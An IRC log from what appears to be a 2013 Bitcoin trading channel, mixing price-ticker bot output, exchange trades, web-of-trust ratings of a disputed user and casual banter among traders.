Mar 20 17:51:54 i got 50k to dump at 1$ or so Mar 20 17:51:54 what if i start an ltc buying fun Mar 20 17:51:57 fund Mar 20 17:52:00 yeah ltc is nice, it shows true value of btc Mar 20 17:52:13 ltc shows the true value of crypto Mar 20 17:52:17 lulz Mar 20 17:52:31 i hold more btc than ltc (in usd value) Mar 20 17:53:01 im a btc guy, but i saw an opertunity in ltc and i took it Mar 20 17:53:25 you are also not a finance guy or something Mar 20 17:53:27 so dunno Mar 20 17:53:33 sock on head. Mar 20 17:53:37 mp's girl thinks im not Mar 20 17:53:48 but i dont care lulz Mar 20 17:54:15 >I don't do finance Mar 20 17:54:21 that from your mouth Mar 20 17:54:23 thats Mar 20 17:54:33 yes, but you forgot the wink Mar 20 17:54:56 i interpret it as "im being honest here" Mar 20 17:55:08 notice how the moves end at 7/8 of a dollar every time? Mar 20 17:55:18 wink Mar 20 17:55:22 well, we are the new banking overlords Mar 20 17:55:42 calm down Bowjob Mar 20 17:55:48 [MPEX] [S.MPOE] 3879 @ 0.00075613 = 2.933 BTC [+] Mar 20 17:55:52 [MPEX] [S.MPOE] 1649 @ 0.00075702 = 1.2483 BTC [+] Mar 20 17:55:53 [MPEX] [S.MPOE] 13172 @ 0.00076717 = 10.1052 BTC [+] Mar 20 17:55:59 im pretty calm Mar 20 17:56:13 yeah will shit himself once btc is 1000:) Mar 20 17:56:15 tune your masturbation amount, its is not correct Mar 20 17:56:20 try less or more Mar 20 17:56:30 or was that someone else Mar 20 17:56:36 sorry if mixed it up Mar 20 17:56:52 that was from your "secret club" last night :) Mar 20 17:57:10 no its a secret FAN club Mar 20 17:57:19 oh yeah, sorry :) Mar 20 17:57:35 youd knew that if you were smart investor! Mar 20 17:57:48 ;D Mar 20 17:59:57 https://bitcointalk.org/index.php?topic=155260.0 Mar 20 18:00:12 [BTCTC] [PAJKA.BOND] 10 @ 0.100001 = 1 BTC [-] Mar 20 18:00:14 [BTCTC] [PAJKA.BOND] 4 @ 0.1 = 0.4 BTC [-] Mar 20 18:00:31 ;;ticker Mar 20 18:00:31 BTCUSD ticker | Best bid: 61.61009, Best ask: 61.97000, Bid-ask spread: 0.35991, Last trade: 61.97000, 24 hour volume: 92984.04562603, 24 hour low: 53.00000, 24 hour high: 63.78700, 24 hour vwap: 58.91450 Mar 20 18:00:42 ;;calc 61*4224 Mar 20 18:00:43 257664 Mar 20 18:00:57 its nice they limit the rally Mar 20 18:01:09 we dont need $150 in 4 days... Mar 20 18:04:16 [BTCTC] [S.MPOE-PT] 5 @ 0.000719 = 0.0036 BTC [+] Mar 20 18:05:17 [BTCTC] [COG.F] 1 @ 2.5 BTC Mar 20 18:05:19 >Garrett, are you still considering an Avalon purchase after reading today's news? Mar 20 18:05:21 lulz Mar 20 18:05:27 :) Mar 20 18:06:06 what news? Mar 20 18:06:16 62.9 Mar 20 18:06:19 > batch3 will be sold between 80 and 115 BTC Mar 20 18:06:21 Diablo-D3^^ Mar 20 18:06:37 and batch 2 wont ship until end of may right? Mar 20 18:06:42 dunno Mar 20 18:06:44 dont care Mar 20 18:06:54 i hold asicminer so i do:) Mar 20 18:06:55 they are in the BFL club for me now Mar 20 18:07:06 bfl has been dead silent the last week, dad is the key word Mar 20 18:07:13 dead Mar 20 18:07:36 but Luke-Jr said they're gonna ship! Mar 20 18:07:43 still you have fury and another chip maker comming out Mar 20 18:08:22 i bet they will ship sooner or later... Mar 20 18:08:31 i hear 4 to 6 weeks Mar 20 18:08:36 hehe Mar 20 18:11:38 63.79 Mar 20 18:11:47 63.99 Mar 20 18:12:09 64,889 Mar 20 18:12:17 65 Mar 20 18:12:23 there we go Mar 20 18:12:49 ;;asks 65 Mar 20 18:12:49 There are currently 4485.7373 bitcoins offered at or under 65.0 USD, worth 288722.532564 USD in total. | Data vintage: 81.9425 seconds Mar 20 18:12:59 ;;asks 54.66 Mar 20 18:13:00 There are currently 0 bitcoins offered at or under 54.66 USD, worth 0.0 USD in total. | Data vintage: 92.4132 seconds Mar 20 18:13:06 ;;asks 64.66 Mar 20 18:13:07 There are currently 2353.8081 bitcoins offered at or under 64.66 USD, worth 150212.942787 USD in total. | Data vintage: 98.9168 seconds Mar 20 18:13:14 this bot is slow as fuck Mar 20 18:17:22 ;;goxlag Mar 20 18:17:22 0.263985 seconds Mar 20 18:17:38 ;;asks 64.66 Mar 20 18:17:40 There are currently 181.48403 bitcoins offered at or under 64.66 USD, worth 11578.8474952 USD in total. | Data vintage: 0.0011 seconds Mar 20 18:17:59 ;;asks 70 Mar 20 18:18:00 There are currently 17923.735 bitcoins offered at or under 70.0 USD, worth 1216110.74987 USD in total. | Data vintage: 19.3849 seconds Mar 20 18:18:06 that is not much... Mar 20 18:18:21 the whale is just waiting for suckers to list coins lower... Mar 20 18:25:05 http://www.quickmeme.com/meme/3tg8ms/ Mar 20 18:25:31 I updated the meme. I told a gaming forum about bitcoins way back then Mar 20 18:25:39 gave them an update, they went holy shit Mar 20 18:26:51 sounds like a waste of time Mar 20 18:27:11 they will eventually give up and buy some in the future Mar 20 18:27:25 I just wanna tell them. "I told you so" Mar 20 18:27:32 seems childlish.. ehehehe Mar 20 18:27:35 on a different topic, someone should put togther a REIT that runs on btc to swoop into shittily-banked countries and swipe their assets out from underneath them at a fraction of their real value because the natives are scared. Mar 20 18:27:50 like I said, bowjob, waste of time. you could be building a company or something. Mar 20 18:29:45 ;;goxlag Mar 20 18:29:45 0.753354 seconds Mar 20 18:29:48 ;;ticker Mar 20 18:29:48 BTCUSD ticker | Best bid: 63.75000, Best ask: 64.73000, Bid-ask spread: 0.98000, Last trade: 64.73000, 24 hour volume: 91975.92783006, 24 hour low: 53.00000, 24 hour high: 64.99980, 24 hour vwap: 59.44622 Mar 20 18:30:06 64 Mar 20 18:31:49 just had 64.75 Mar 20 18:34:40 its rainy here Mar 20 18:34:59 heh, i accidentally wore my pants backwards Mar 20 18:35:05 apparently its insanely good luck Mar 20 18:35:16 chaang ltc might dip into your Buy zone Mar 20 18:35:47 under .009 Mar 20 18:35:58 yeap its under 8 Mar 20 18:36:01 i mean 9 Mar 20 18:36:14 my eye is on it Mar 20 18:37:52 I kinda feel bad for people who borrow BTC Mar 20 18:38:09 they'll get gored by the bull Mar 20 18:38:28 Bowjob: i just had someone ask me to lend to them when wer were ~10 bucks lower Mar 20 18:38:47 I lent 3 BTC to a reputable person, I hope they make profit on it Mar 20 18:38:56 thats when BTC was 58 bucks Mar 20 18:39:17 in two weeks, BTC may well be $75 Mar 20 18:39:18 ea Mar 20 18:39:37 $100 before end of month Mar 20 18:39:56 [BTCTC] [S.DICE-PT] 63 @ 0.00396 = 0.2495 BTC [-] Mar 20 18:40:07 it was way more exciting when i was broke Mar 20 18:40:10 living on 10 bucks a day Mar 20 18:40:11 heh Mar 20 18:40:25 when i got my first paycheck Mar 20 18:40:28 for 840 dollars Mar 20 18:40:33 felt like a million bucks Mar 20 18:41:12 ;;8ball when goat dies will he get 72 virgins? Mar 20 18:41:12 Maybe... Mar 20 18:41:16 meh Mar 20 18:41:22 want the old exciting way of life back? Mar 20 18:41:24 !ticker m s.dice Mar 20 18:41:24 1BitcoinEaterAddressDontSendf59kuE Mar 20 18:41:25 [MPEX:S.DICE] 1D: 0.00381798 / 0.00413145 / 0.005 (160717 shares, 663.99 BTC), 7D: 0.00381798 / 0.00444285 / 0.00599987 (232474 shares, 1,032.85 BTC), 30D: 0.00300001 / 0.00596521 / 0.0069 (2433117 shares, 14,514.06 BTC) Mar 20 18:41:40 Nah, I'm better off like this Mar 20 18:41:41 lol Mar 20 18:41:45 cmon Mar 20 18:41:47 kakobrekla: man, I wanna vanitygen that Mar 20 18:41:48 eater is hungry Mar 20 18:41:54 the old exciting life.. ughh Mar 20 18:42:04 10 bucks a day. walk to school Mar 20 18:42:07 no money for bus Mar 20 18:42:34 Well, even at 10 bucks a day, I managed to save like $500 without starving myself Mar 20 18:42:50 heh Mar 20 18:42:53 you wanna save money? Mar 20 18:42:54 go paleo Mar 20 18:42:59 paleo? Mar 20 18:43:10 go amish Mar 20 18:43:11 or soylent :) Mar 20 18:43:15 im pretty loaded right now, both fiat and btc Mar 20 18:43:47 i wish id appreciate 10 bucks today like 10 bucks back then Mar 20 18:43:50 its just.. inflation Mar 20 18:44:11 and its just been 3 years, i can feel the price go up Mar 20 18:44:17 mt gox is broken Mar 20 18:44:25 fucking gox Mar 20 18:44:27 yeah Mar 20 18:44:30 what else is new Mar 20 18:44:30 lol Mar 20 18:44:32 ima gonna put btc/usd in mt4 Mar 20 18:44:36 problem solved Mar 20 18:44:50 if i gave mt gox $100k usd think they could fix this? Mar 20 18:44:59 lol Mar 20 18:45:02 are you a comedian Mar 20 18:45:09 you should hang out with usagi Mar 20 18:45:29 i know, they will need much much more Mar 20 18:45:34 mt gox makes way more than $100k Mar 20 18:45:35 lol Mar 20 18:45:50 they are unfixable Mar 20 18:45:57 kako i just be trollin, its what i do for a living Mar 20 18:46:05 pays good? Mar 20 18:46:26 i could not make more money at anything else, so i guess so Mar 20 18:46:50 u do it at a bar Mar 20 18:46:52 but really... gox... Mar 20 18:47:06 when i go to a bar im the silent guy in the corner Mar 20 18:47:30 but in the trollbox Mar 20 18:47:31 that all the hot girls go to and wai, and all the thai guys are like wtf? ;D Mar 20 18:47:33 hes the big boss Mar 20 18:47:46 yeah, in this box, im just an average fish Mar 20 18:48:00 gah. i want a new coat Mar 20 18:48:10 i want new goat Mar 20 18:48:14 its freezing here in vancouver Mar 20 18:48:23 that is the last thing i want (a coat) i could use a goat.. grass is tall Mar 20 18:48:25 id reckon spring and fall is actually colder than winter Mar 20 18:48:35 winter is just.. idk lol. not as cold Mar 20 18:48:48 all the snow makes it warm. Mar 20 18:48:51 once i get a million usd im going to anartica, andyone else have plans for 1 million usd? Mar 20 18:49:20 meh antartica Mar 20 18:49:27 ant arc tica Mar 20 18:49:48 iv never been Mar 20 18:50:12 yeah, snow makes for warmer surroundings oddly enough Mar 20 18:50:29 the wind just freezes me inside Mar 20 18:54:05 are Cypriot banks still closed? Mar 20 18:54:15 afaik ya Mar 20 18:54:30 and they will likely stay closed longer Mar 20 18:54:30 yeah, will they ever open again? Mar 20 18:54:49 we need a bitbet 4 that Mar 20 18:54:51 prolly after their parliament reaches some decision Mar 20 18:54:57 banks open by april 1st or so Mar 20 18:55:46 can anyone remember when btc broke 50? seems like yesterday Mar 20 18:57:22 ;;goxlag Mar 20 18:57:22 1.244448 seconds Mar 20 18:57:24 ;;ticker Mar 20 18:57:24 BTCUSD ticker | Best bid: 63.25002, Best ask: 63.48000, Bid-ask spread: 0.22998, Last trade: 64.05000, 24 hour volume: 86416.29418274, 24 hour low: 53.60931, 24 hour high: 64.99980, 24 hour vwap: 59.92861 Mar 20 18:58:03 that ticker right? Mar 20 18:58:14 hi ineededausername Mar 20 18:58:22 hi goat :) Mar 20 18:58:34 kakobrekla: http://www.reddit.com/r/Bitcoin/comments/1ao5eg/today_i_learned_you_can_use_mt4_for_bitcoin/ Mar 20 19:00:04 [BTCTC] [BASIC-MINING] 3 @ 0.33318 = 0.9995 BTC [-] Mar 20 19:00:09 you cant use it to trade btc/usd pair (yet) Mar 20 19:00:21 hes prolly confused about that Mar 20 19:00:37 ;;ticker Mar 20 19:00:37 BTCUSD ticker | Best bid: 63.48000, Best ask: 63.60000, Bid-ask spread: 0.12000, Last trade: 63.48000, 24 hour volume: 86370.84658881, 24 hour low: 53.60931, 24 hour high: 64.99980, 24 hour vwap: 59.93938 Mar 20 19:00:42 ;;goxlag Mar 20 19:00:43 2.22098 seconds Mar 20 19:01:15 kako i know, just that you may want to comment there Mar 20 19:01:36 by their standards ima scammer Mar 20 19:01:43 who gives Mar 20 19:01:43 it took me a while to understand how btc is used on bit4x Mar 20 19:02:18 oooh, me too. still have screenshot of how was coinbr announcement received by reddit Mar 20 19:02:24 for shits and giggles Mar 20 19:02:30 heh Mar 20 19:03:42 ;;ticker Mar 20 19:03:42 BTCUSD ticker | Best bid: 63.50002, Best ask: 64.00000, Bid-ask spread: 0.49998, Last trade: 64.00000, 24 hour volume: 86281.05475386, 24 hour low: 53.60931, 24 hour high: 64.99980, 24 hour vwap: 59.95506 Mar 20 19:05:18 Mar20 17:04:03 mtgox x5 100.0000 @ 64.00246812 USD life Mar 20 19:05:24 ;;ticker Mar 20 19:05:24 BTCUSD ticker | Best bid: 63.50003, Best ask: 64.42999, Bid-ask spread: 0.92996, Last trade: 64.43000, 24 hour volume: 86359.93202852, 24 hour low: 53.60931, 24 hour high: 64.99980, 24 hour vwap: 59.96982 Mar 20 19:05:34 fun shit Mar 20 19:05:36 whoosh Mar 20 19:05:41 going to 100! Mar 20 19:05:48 ;;bc,price Mar 20 19:05:48 Next Price Estimate: 70.872978 | Next Price In About 2 days, 23 hours, 11 minutes, and 14 seconds Mar 20 19:05:54 ok, maybe only 70 ;) Mar 20 19:06:08 the mpex OIX is so wrong Mar 20 19:06:09 lol Mar 20 19:06:18 it said $39 or something Mar 20 19:06:19 lol Mar 20 19:06:51 look it inau Mar 20 19:06:56 what do you think, will mp manage to add new options before price crosses 75? Mar 20 19:07:03 gtfoff my rocket inau Mar 20 19:07:34 [MPEX] [S.MPOE] 10850 @ 0.0007499 = 8.1364 BTC [-] Mar 20 19:07:42 wtb C5000N Mar 20 19:13:10 !ticker m ^OIX Mar 20 19:13:11 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / 57.56498348 / 57.56498348 (6790 shares, 792.60 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 20 19:14:45 ;;ticker Mar 20 19:14:45 BTCUSD ticker | Best bid: 63.68001, Best ask: 63.79500, Bid-ask spread: 0.11499, Last trade: 63.79500, 24 hour volume: 85046.90197713, 24 hour low: 55.10000, 24 hour high: 64.99980, 24 hour vwap: 60.10183 Mar 20 19:15:12 $65 is the ath Mar 20 19:20:51 ;;ticker Mar 20 19:20:52 BTCUSD ticker | Best bid: 63.38002, Best ask: 63.60130, Bid-ask spread: 0.22128, Last trade: 63.38002, 24 hour volume: 85696.78091179, 24 hour low: 55.30001, 24 hour high: 64.99980, 24 hour vwap: 60.17280 Mar 20 19:21:06 im thinking of a black aventador/ mhm Mar 20 19:29:56 lol reddit jurov, one idiot bigger than the other Mar 20 19:30:33 [MPEX] [S.DICE] 1800 @ 0.004 = 7.2 BTC [+] Mar 20 19:30:45 how do you mean "reddit jurov, one idiot bigger than the other" ? Mar 20 19:31:10 [MPEX] [S.DICE] 18481 @ 0.004 = 73.924 BTC [+] Mar 20 19:31:30 commenting the comment posted on that forex thread or whatever the thing is called on reddit Mar 20 19:32:30 okay... just got alternative meaning of that sentence first Mar 20 19:32:39 :D Mar 20 19:32:42 usagi is offline now but he sent me a query that he's upset because he claimed i lied to him because he told me not to post the spreadsheet to a public web page or post it to the forum Mar 20 19:33:01 and he claims I sent derived an edited copy, which I did not Mar 20 19:33:08 pigeons: what link did i miss Mar 20 19:33:12 you say it was a mistake Mar 20 19:33:17 hey pigeons guess who i believe Mar 20 19:33:22 he prolly ment please YES post it Mar 20 19:33:25 i bet you'll never guess Mar 20 19:33:46 smickles: https://bitcointalk.org/index.php?topic=137459.120 Mar 20 19:34:02 pigeons always starting drama on the forums Mar 20 19:34:08 u cray pigeons Mar 20 19:34:24 kakobrekla: i didnt post it, i sent it to deprived who posted an except of the part that shows he calculates exactly what a share is worth a knows its 100% overpriced Mar 20 19:34:39 aha k Mar 20 19:34:44 and i didnt send an edited version of course, why would i do that? Mar 20 19:35:57 lol Mar 20 19:36:09 [MPEX] [S.DICE] 5 @ 0.004805 = 0.024 BTC [+] Mar 20 19:36:11 okay in a few days ill pay for the next share:) Mar 20 19:36:29 he says im revoked from access Mar 20 19:36:37 yeah, we need a new guy Mar 20 19:36:51 i dont think that will be hard to find Mar 20 19:37:11 any i need to sleep, good trading all Mar 20 19:40:37 [MPEX] [S.MPOE] 2600 @ 0.0007499 = 1.9497 BTC [-] Mar 20 19:40:43 [MPEX] [S.MPOE] 3056 @ 0.00074912 = 2.2893 BTC [-] Mar 20 19:40:45 [MPEX] [S.MPOE] 592 @ 0.00074461 = 0.4408 BTC [-] Mar 20 19:40:47 [MPEX] [S.MPOE] 652 @ 0.0007446 = 0.4855 BTC [-] Mar 20 19:41:49 so,all s.dice @0.004 gone, what shall i do with the stash? wait for divs? Mar 20 19:42:16 or for whale Mar 20 19:42:21 buy low, sell high Mar 20 19:43:37 looks like .003 is a good support level in ther Mar 20 19:43:39 *there Mar 20 19:44:37 heh nobody wants to sell less than 66% of ipo price Mar 20 19:45:38 would move it to bf and sell there, if g.sdice wasn't ghost town :( Mar 20 19:45:56 [HAVELOCK] [HIM] 1 @ 1.856 BTC [-] Mar 20 19:47:01 btc grows too fast, ruins stock trade :( haha Mar 20 19:47:55 [HAVELOCK] [SDICE] 3 @ 0.494 = 1.482 BTC [+] Mar 20 19:48:53 soebot up and running again :) Mar 20 19:49:03 nasty overflow error Mar 20 19:49:03 on tu silver - i looked at that report Mar 20 19:49:18 80 oz * 28 / 63 Mar 20 19:49:19 $markov usagi Mar 20 19:49:19 jurov: Error: I found a broken link in the Markov chain. Maybe I received two bad links to start the chain. Mar 20 19:49:24 oh that's other bot Mar 20 19:49:31 $markov Mar 20 19:49:31 i can see you with half you face painted blue right now, mircea_popescu Mar 20 19:49:54 35 bitcoins miuns debt applied of 46 btc Mar 20 19:50:03 jurov: the broken link thing happens when the bot hasn't seen someone start a line with the given word Mar 20 19:50:13 let's test it Mar 20 19:50:13 plus the 3 btc left Mar 20 19:50:18 $markov i Mar 20 19:50:18 i wasn;t,no Mar 20 19:50:24 $markov and Mar 20 19:50:25 and trades by email are supported automatically? Mar 20 19:50:28 so the fund is worth -8 approx btc? Mar 20 19:50:29 usagi wanker wanker bumble but Mar 20 19:50:32 $usagi Mar 20 19:50:38 $markov usagi Mar 20 19:50:38 smickles: Error: I found a broken link in the Markov chain. Maybe I received two bad links to start the chain. Mar 20 19:50:41 bah Mar 20 19:50:46 i dunno then Mar 20 19:50:50 $markov he Mar 20 19:50:51 jurov: Error: I found a broken link in the Markov chain. Maybe I received two bad links to start the chain. Mar 20 19:50:51 i don't know, he ownse some options on his own shares and some JAH mining shares Mar 20 19:51:34 he being TU.SILVER Mar 20 19:51:56 [HAVELOCK] [SDICE] 1 @ 0.484 BTC [-] Mar 20 19:54:03 ;;calc -8/800 Mar 20 19:54:04 -0.01 Mar 20 19:54:24 ^ approx value of tu.silver- if I am not missing something Mar 20 19:55:55 we need to push people running bitcoin companies on extreme transparency Mar 20 19:56:15 verifiable business practices Mar 20 19:56:40 i'm glad that people on the forum are running usagi through the grinder Mar 20 19:56:54 i think the real question is "how many russian mobsters do we need to get to buy bitcoin?" :D Mar 20 19:56:58 bar needs to be way higher. Mar 20 19:57:17 need? Mar 20 19:57:18 zero. Mar 20 19:57:36 need is such a strong word. typically used by people who don't really understand what it is to need a thing. Mar 20 19:57:48 like Mar 20 19:57:54 i need a vpn to do my stuff Mar 20 19:57:55 wrong Mar 20 19:58:05 is reading satire one of your strong points? Mar 20 19:58:07 just use ssh, and fish through the connections with a coathanger Mar 20 19:58:38 ignoring it is. Mar 20 19:59:20 but while we're on the topic, what was the actual point you were trying to make? i can't read it through all the funny. Mar 20 20:00:24 (also it turns out i do need a vpn, for efficiency. the thing about using irony online is that you have to explain it to people. hence, "coathanger".) Mar 20 20:01:43 i just let them think im stuoid Mar 20 20:02:11 >>stuoid Mar 20 20:02:15 ;) Mar 20 20:02:26 thanks for posting the thing, pigeons Mar 20 20:02:43 ;;ident Mar 20 20:02:43 You are not identified. Mar 20 20:03:21 team effort Mar 20 20:03:45 pass my thanks on to team plz Mar 20 20:03:57 ;;rated usagi Mar 20 20:03:57 You rated user usagi on Sun Nov 11 18:00:33 2012, giving him a rating of -1, and supplied these additional notes: defaulted on this: http://bitbin.it/nPDQRLME and tries overcome simple facts with appeals to emotion. Mar 20 20:03:59 ;) Mar 20 20:04:37 aw, bitbinit is down? Mar 20 20:04:53 naw Mar 20 20:04:56 just taking a while Mar 20 20:05:17 wowee Mar 20 20:05:29 where did he respond to defaulting? Mar 20 20:05:39 ;;rated usagi Mar 20 20:05:40 You rated user usagi on Thu Nov 15 13:23:03 2012, giving him a rating of -1, and supplied these additional notes: person strikes me a bit flaky. Mar 20 20:05:43 or address his failure to pay? Mar 20 20:05:43 in a forum thread somewhere Mar 20 20:05:47 baww Mar 20 20:06:15 anyone want to invest in https://www.cavirtex.com? i can do pre-release private invitations -- it goes public tomorrow. Mar 20 20:06:25 it'll be listed on havelock under symbol VTX Mar 20 20:06:48 benkay: basically, shit was hitting the fan with glbse, I asked him if he'd be able to pay. he said yes, then vanished for a while, defaulted and then said i was heartless Mar 20 20:06:57 ;;ident topace Mar 20 20:06:58 Nick 'topace', with hostmask 'topace!~kvirc@unaffiliated/topace', is not identified. Mar 20 20:07:01 I'll find the link for you Mar 20 20:07:07 no worries Mar 20 20:07:17 i trust your read on the thing Mar 20 20:07:46 pigeons, correct me if i'm wrong, but it's bad form to rate someone without having performed a transaction with them Mar 20 20:07:57 but *I think* that it's bad form... Mar 20 20:08:02 benkay: i disagree as does the founder of the web of trust Mar 20 20:08:07 it's a trust rating Mar 20 20:08:13 hm Mar 20 20:08:16 not a done-biz-with rating Mar 20 20:08:21 hm hm hm Mar 20 20:08:26 i used to hold back more, but people have been scammed and i never said anything Mar 20 20:08:50 also, people have been scammed b/c i didn't rate people Mar 20 20:09:00 so rate people Mar 20 20:09:05 it helps others Mar 20 20:09:18 has anyone done any work on distributing the WoT? Mar 20 20:09:29 #bitcoin-wot iirc Mar 20 20:09:43 benkay: yeah v2 proposal is distributed #bitcoin-wot Mar 20 20:09:46 thanks Mar 20 20:10:41 and i did do business with him , i bought his cdos from mpex and he proceeded to sell all the C out from the DOs and then told me it was impossible for cpa to go bankrupt when i asked him about it Mar 20 20:10:58 then went bankrupt Mar 20 20:11:14 damn Mar 20 20:11:45 damn pigeons Mar 20 20:11:54 and you're not rating him for that? Mar 20 20:12:09 why the "seems flaky" instead of "fucked me hard"? Mar 20 20:12:14 i cant even succintly explain all the stupid involved for a rating Mar 20 20:12:25 cause that's his problem, he's a fuckin nut Mar 20 20:12:28 and why just a -1? Mar 20 20:12:45 the -1 was at a time when he was working to repay folks Mar 20 20:13:22 my rating of usagi is, dude is flaky, warning Mar 20 20:13:42 hm Mar 20 20:14:06 ;;rate topace 2 Mar 20 20:14:07 Rating entry successful. Your rating of 2 for user topace has been recorded. Mar 20 20:17:14 usagi had 3 different risk profiles for his cdos, and he bought OBSI.HYPT (High Yield Pass Through into secret business model now run away with the money) in the EXTREMELY LOW RISK group Mar 20 20:18:08 also flat out lied about the valuations. something sells for X and he says "book value" is X * 10 because mining is looking good Mar 20 20:18:30 thanks pigeons :) Mar 20 20:18:36 i should figure out how to auth myself with gribble again Mar 20 20:18:38 been so long Mar 20 20:19:11 eauth topace Mar 20 20:19:28 curl whatever | gpg --decrypt Mar 20 20:19:55 send plaintext to gribble Mar 20 20:21:06 ;;ident topace Mar 20 20:21:07 Nick 'topace', with hostmask 'topace!~kvirc@unaffiliated/topace', is identified as user topace, with GPG key id A49472A32D4FCE50, key fingerprint 08AEAC40F3086E6131B39762A49472A32D4FCE50, and bitcoin address None Mar 20 20:21:31 ;;getrating topace Mar 20 20:21:31 Currently authenticated from hostmask topace!~kvirc@unaffiliated/topace . User topace, rated since Wed Jun 8 15:37:29 2011. Cumulative rating 25, from 10 total ratings. Received ratings: 10 positive, 0 negative. Sent ratings: 6 positive, 0 negative. Details: http://bitcoin-otc.com/viewratingdetail.php?nick=topace Mar 20 20:22:03 http://wiki.bitcoin-otc.com/wiki/GPG_authentication#Helper_scripts Mar 20 20:23:38 $depth s.dice Mar 20 20:23:39 smickles: Bids: ['1576 @ 0.00393432', '5034 @ 0.003198', '805000 @ 0.0031', '116759 @ 0.00100118', '42030 @ 0.00100117'] Mar 20 20:23:40 smickles: Asks: ['995 @ 0.004805', '201 @ 0.005', '6623 @ 0.0051', '41800 @ 0.0056', '19183 @ 0.00576999'] Mar 20 20:25:23 [MPEX] [S.DICE] 995 @ 0.004805 = 4.781 BTC [+] Mar 20 20:32:38 [MPEX] [S.MPOE] 3241 @ 0.00076404 = 2.4763 BTC [+] Mar 20 20:32:40 [MPEX] [S.MPOE] 592 @ 0.00076716 = 0.4542 BTC [+] Mar 20 20:32:42 [MPEX] [S.MPOE] 5059 @ 0.00076717 = 3.8811 BTC [+] Mar 20 20:51:55 [HAVELOCK] [KCIM] 1 @ 1.2 BTC [+] Mar 20 20:54:33 [BTCTC] [COG.F] 1 @ 2.5 BTC Mar 20 20:57:14 [BTCTC] [S.BBET-PT] 10 @ 0.00178 = 0.0178 BTC [-] Mar 20 20:57:34 just realised who the bitcoin pride guy is Mar 20 20:57:55 [BTCTC] [BITVPS] 1 @ 0.00413 BTC [-] Mar 20 20:57:57 [BTCTC] [BITVPS] 1 @ 0.00412 BTC [-] Mar 20 20:57:59 [BTCTC] [BITVPS] 1 @ 0.0041 BTC [-] Mar 20 20:58:01 [BTCTC] [BITVPS] 3 @ 0.00369 = 0.0111 BTC [-] Mar 20 20:58:03 [BTCTC] [BITVPS] 10 @ 0.00351 = 0.0351 BTC [-] Mar 20 20:58:05 [BTCTC] [BITVPS] 3 @ 0.00328 = 0.0098 BTC [-] Mar 20 20:58:10 dub, who is he? Mar 20 20:58:55 one of realsolids fan boys or perhaps personalities Mar 20 20:59:07 ha Mar 20 20:59:15 wow the shirts on that site are uniformly horrid. Mar 20 20:59:21 one of the top 5 most retarded forum users Mar 20 20:59:55 bitcoin wifey? Mar 20 21:00:45 let's just cement the tech community's reputation for misogyny. Mar 20 21:01:25 not one "Free the Market, Free the World" shirt. Mar 20 21:01:28 dub, realsolid on bitcoin: http://memegenerator.net/instance/36422651 Mar 20 21:03:10 BFLievers alert! Difficulty future CoinBr.iDiff-O paid and reissued with 15th May expiration: http://bit.ly/WVtL6x . Mar 20 21:03:18 Also,CoinBr.iDiff-E sells now at 0.095 only. Mar 20 21:03:46 Al Gore is RealSolid? Mar 20 21:03:49 [BTCTC] [BTC-BOND] 10 @ 0.0099 = 0.099 BTC [+] Mar 20 21:04:09 no, al gore is a big fan of bitcoins Mar 20 21:04:26 lol fuck al gore in his ear Mar 20 21:04:45 by a big manbearpig Mar 20 21:04:50 [BTCTC] [BTC-BOND] 28 @ 0.0099 = 0.2772 BTC [+] Mar 20 21:05:26 haha Mar 20 21:08:10 http://cdn.memegenerator.net/instances/400x/15246076.jpg lol Mar 20 21:21:49 smickles: hahah Mar 20 21:24:40 who dat is? Mar 20 21:28:39 dub, no idea Mar 20 21:28:45 1890's guy meme Mar 20 21:39:48 ;;ticker Mar 20 21:39:49 BTCUSD ticker | Best bid: 63.64997, Best ask: 63.64998, Bid-ask spread: 0.00001, Last trade: 63.64997, 24 hour volume: 80512.67272484, 24 hour low: 57.02000, 24 hour high: 64.99980, 24 hour vwap: 60.83886 Mar 20 21:42:14 [MPEX] [S.DICE] 1 @ 0.00499999 BTC [+] Mar 20 21:42:31 [BTCTC] [ASICMINER-PT] 2 @ 0.858991 = 1.718 BTC [-] Mar 20 21:43:12 [BTCTC] [ASICMINER-PT] 8 @ 0.858991 = 6.8719 BTC [-] Mar 20 21:47:33 [BTCTC] [ASICMINER-PT] 6 @ 0.858991 = 5.1539 BTC [-] Mar 20 21:52:07 [BTCTC] [ASICMINER-PT] 1 @ 0.858991 BTC [-] Mar 20 21:57:11 thinking out loud, is it possible asicminer was waiting to increase their hashing a lot until they had met their IPO obligation of .01? Now that they have pretty much reached that, they can start paying themselves half. Mar 20 21:57:58 anything's possible. Mar 20 21:57:59 they also mentioned that they might hold back on hashing in the future to try and reduce difficulty changes Mar 20 21:58:13 maybe those two notions combined Mar 20 21:58:19 add up to something Mar 20 22:08:56 [BTCTC] [ASICMINER-PT] 1 @ 0.858 BTC [-] Mar 20 22:11:50 $91/BTC = "One beeellion dollars" Mar 20 22:13:08 wow, that's like $250/oz in fan club silver Mar 20 22:13:25 ;;asks 70 Mar 20 22:13:28 There are currently 18945.979 bitcoins offered at or under 70.0 USD, worth 1287280.13071 USD in total. | Data vintage: 0.0018 seconds Mar 20 22:13:34 ;;asks 69.99 Mar 20 22:13:34 There are currently 18661.56 bitcoins offered at or under 69.99 USD, worth 1267370.78922 USD in total. | Data vintage: 5.7516 seconds Mar 20 22:13:49 ;;asks 65 Mar 20 22:13:49 There are currently 2767.5768 bitcoins offered at or under 65.0 USD, worth 179691.531073 USD in total. | Data vintage: 21.2104 seconds Mar 20 22:14:04 ThickAsThieves, stop, ur killing mtgox :) Mar 20 22:14:51 lol Mar 20 22:15:12 ;;goxlag Mar 20 22:15:13 0.166135 seconds Mar 20 22:15:19 it can take the abuse it seems Mar 20 22:17:59 if today someone on the street asked me what bitcoin costs, i'll be liek Mar 20 22:18:12 $50.. err.. $60... err... lemme check Mar 20 22:18:57 http://imgs.xkcd.com/comics/estimation.png Mar 20 22:19:01 like this Mar 20 22:19:28 [BTCTC] [ASICMINER-PT] 1 @ 0.858991 BTC [+] Mar 20 22:19:47 24hr weighted avg? Mar 20 22:19:56 24hr weighted avg of biggest exchanges, maybe. Mar 20 22:20:07 ;;vwap Mar 20 22:20:08 Error: "vwap" is not a valid command. Mar 20 22:20:12 $vwap Mar 20 22:20:16 benkay: http://pastebin.com/raw.php?i=hayxi7Pw Mar 20 22:20:18 ;;bc,24hprc Mar 20 22:20:21 60.84 Mar 20 22:20:38 prc? Mar 20 22:20:58 PRiCe? Mar 20 22:25:53 volume weighted or anything? Mar 20 22:26:10 ;;bc,12hprc Mar 20 22:26:11 Error: 